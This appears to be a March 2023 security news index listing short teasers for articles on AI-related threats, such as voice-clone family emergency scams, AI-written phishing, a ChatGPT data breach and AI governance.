Security | Threat Detection | Cyberattacks | DevSecOps | Compliance

March 2023

The New Face of Fraud: FTC Sheds Light on AI-Enhanced Family Emergency Scams

The Federal Trade Commission is alerting consumers about a next-level, more sophisticated family emergency scam that uses AI that imitates the voice of a "family member in distress". They started out with: "You get a call. There's a panicked voice on the line. It's your grandson. He says he's in deep trouble — he wrecked the car and landed in jail. But you can help by sending money. You take a deep breath and think. You've heard about grandparent scams. But darn, it sounds just like him.

What Generative AI Means For Cybersecurity: Risk & Reward

In recent years, generative artificial intelligence (AI), especially Large Language Models (LLMs) like ChatGPT, has revolutionized the fields of AI and natural language processing. From automating customer support to creating realistic chatbots, we rely on AI much more than many of us probably realize. The AI hype train definitely reached full steam in the last several months, especially for cybersecurity use cases, with the release of tools such as.

Artificial Intelligence Makes Phishing Text More Plausible

Cybersecurity experts continue to warn that advanced chatbots like ChatGPT are making it easier for cybercriminals to craft phishing emails with pristine spelling and grammar, the Guardian reports. Corey Thomas, CEO of Rapid7, stated, “Every hacker can now use AI that deals with all misspellings and poor grammar. The idea that you can rely on looking for bad grammar or spelling in order to spot a phishing attack is no longer the case.

ChatGPT Suffered From a Major Data Breach Exposing its Subscribers

ChatGPT is OpenAi's chatbot designed to simulate conversations with other people. The tool utilizes a massive language model to produce realistic and believable responses for a conversation. OpenAI offers a subscription service known as ChatGPT Plus that offers preferential access to the powerful AI system for subscribers. Some of these subscribers were exposed in the first-ever ChatGPT data breach that occurred in March this year.

5 cyber threats that criminals can generate with the help of ChatGPT

ChatGPT, the public generative AI that came out in late November 2022, has raised legitimate concerns about its potential to amplify the severity and complexity of cyberthreats. In fact, as soon as OpenAI announced its release many security experts predicted that it would only be a matter of time before attackers started using this AI chatbot to craft malware or even augment phishing attacks.

How Can AI Predict Cybersecurity Incidents?

As technology becomes more prevalent in our lives, the risk of cybersecurity incidents is also increasing. Cybersecurity incidents can cause significant damage to organizations, including financial loss, reputational damage, and theft of sensitive data. Therefore, it is essential to have a robust cybersecurity system in place to protect against cyber-attacks. Artificial intelligence (AI) is one technology that can be used to predict cybersecurity incidents and mitigate their associated risks.

CrowdStrike's Artificial Intelligence Tooling Uses Similarity Search to Analyze Script-Based Malware Attack Techniques

According to the AV-TEST Institute, more than 1 billion strains of malware have been created, and more than 500,00 new pieces of malware are detected every day. One of the main reasons for this rapid growth is that malware creators frequently reuse source code. They modify existing malware to meet the specific objectives of an attack campaign or to avoid signature-based detection.

ChatGPT: The Right Tool for the Job?

Since it was first released to the public late last year, ChatGPT has successfully captured the attention of many. OpenAI’s large language model chatbot is intriguing for a variety of reasons, not the least of which is the manner in which it responds to human users. ChatGPT’s language usage resembles that of an experienced professional. But while its responses are delivered with unshakeable confidence, its content is not always as impressive.

Coffee Talk with SURGe: Oakland Ransomware Attack, BreachForums, Acropalypse Vulnerability, GPT-4

Grab a cup of coffee and join Ryan Kovar, Mick Baccio, and Audra Streetman for another episode of Coffee Talk with SURGe. The team from Splunk will discuss the latest security news, including: Mick and Ryan shared their takes on responding to 0day vulnerabilities and the trio also discussed GPT-4 and the future of generative AI.

AI Has Your Business Data

Some of the world’s largest tech companies, like Google and Microsoft, have embedded AI into their business productivity suites, with Microsoft going a step further and releasing AI Copilot for Power Apps, its low-code platform. This integration has raised concerns over the decision-making power granted to business users to integrate data with AI and grant access, which can be done without oversight or control from IT.

Key Security AI Adoption Trends for 2023

It’s hard to go a day without some headline touting how generative AI is transforming the future of work. And this sentiment certainly rings true in the security industry as security operations centers (SOCs) continue to mature their security posture with automation so that they can protect their enterprise and customer data. But how are leaders and teams feeling about the progress of AI adoption and how the tools are being used?

The Risks of Using ChatGPT to Write Client-Side Code

Since OpenAI released its AI chatbot software ChatGPT in November of 2022, people from all over the internet have been vocal about this program recently. Whether you love this software or despise it, the bottom line on it seems to be that the technology behind ChapGPT isn’t going anywhere. At least not in the near-to-distant future, it seems. Those who have been curious can try out this enhanced conversational AI software, have found that their results are often varied when using ChatGPT.

Five worthy reads: Hello from the dark side-the nefarious nature of voice AI technology

Five worthy reads is a regular column on five noteworthy items we’ve discovered while researching trending and timeless topics. This week, we are exploring voice-activated AI technology that allows computers to comprehend and respond to human speech, while analyzing some of its detrimental drawbacks.

Getting Started on Governing AI Issues

Today we are going to keep looking at artificial intelligence and how corporations can get ahead of the risks thereof. Our previous post on AI was primarily a list of potential risks that could run rings around your company if you’re not careful; so what steps can the board and senior executives take to prevent all that? Well, first things first. AI is a new technology.

Using ChatGPT to Improve Your Cybersecurity Posture

On November 30, 2022, ChatGPT quaked the digital world, sending a tremor that even rattled the cybersecurity industry. Instead of responding in panic, a more sensible approach is to begin learning how to leverage the technology to streamline your workflow and optimize your skills. In this post, we explain how ChatGPT can be used to improve your cybersecurity posture and data breach resilience.

EP 22 - Deep Fakes, ChatGPT and Disinformation: Theresa Payton on Evolving Digital Threats (Part 2)

Today’s episode is part two of our conversation with former White House CIO, bestselling author and founder and CEO of Fortalice Solutions, Theresa Payton. If you missed part one, you can start here and go back to that episode. Or, you can start there and come back to this one – but you’re already here, so maybe just stick around?